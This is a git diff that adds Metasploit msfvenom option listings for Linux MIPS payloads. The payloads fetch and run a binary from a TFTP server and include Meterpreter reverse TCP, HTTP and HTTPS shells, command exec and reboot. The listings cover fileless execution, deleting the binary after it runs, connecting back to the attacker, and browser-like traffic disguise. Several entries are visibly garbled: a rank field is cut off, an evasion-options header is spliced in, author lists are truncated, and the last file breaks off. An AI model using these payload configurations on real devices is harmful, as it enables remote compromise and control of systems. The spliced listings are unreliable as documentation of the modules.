@@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/mips64/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME UFpMtCCwLd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a MIPS64 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsbe-exec.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-exec.txt new file mode 100644 index 0000000..efa3092 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-exec.txt @@ -0,0 +1,69 @@ + + Name: TFTP Fetch, Linux Execute Command + Module: payload/cmd/linux/tftp/mipsbe/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + entropy + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME rotHNggWg no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from a TFTP server. + + A very small shellcode for executing commands. + This module is sometimes helpful for testing purposes. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..1c4d2bf --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter-reverse_tcp.txt @@ -0,0 +1,100 @@ + + Name: TFTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/tftp/mipsbe/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Norm +Evasion options for payload/cmd/linux/tftp/mipsbe/meterpreter/reverse_tcp: +========================= + + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME MLfxcUCsTA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from a TFTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter_reverse_http.txt new file mode 100644 index 0000000..77e791d --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter_reverse_http.txt @@ -0,0 +1,104 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_http: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME kGzVIZUQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter_reverse_https.txt new file mode 100644 index 0000000..d0b72be --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter_reverse_https.txt @@ -0,0 +1,106 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_https: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME XduMWfjF no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..7d058a3 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter_reverse_tcp.txt @@ -0,0 +1,97 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ywhTkSWGHccV no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsbe-reboot.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-reboot.txt new file mode 100644 index 0000000..5b23016 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-reboot.txt @@ -0,0 +1,69 @@ + + Name: TFTP Fetch, Linux Reboot + Module: payload/cmd/linux/tftp/mipsbe/reboot + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + rigan - + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME tDHUVUhvrxY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from a TFTP server. + + A very small shellcode for rebooting the system. + This payload is sometimes helpful for testing purposes or executing + other payloads that rely on initial startup procedures. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an 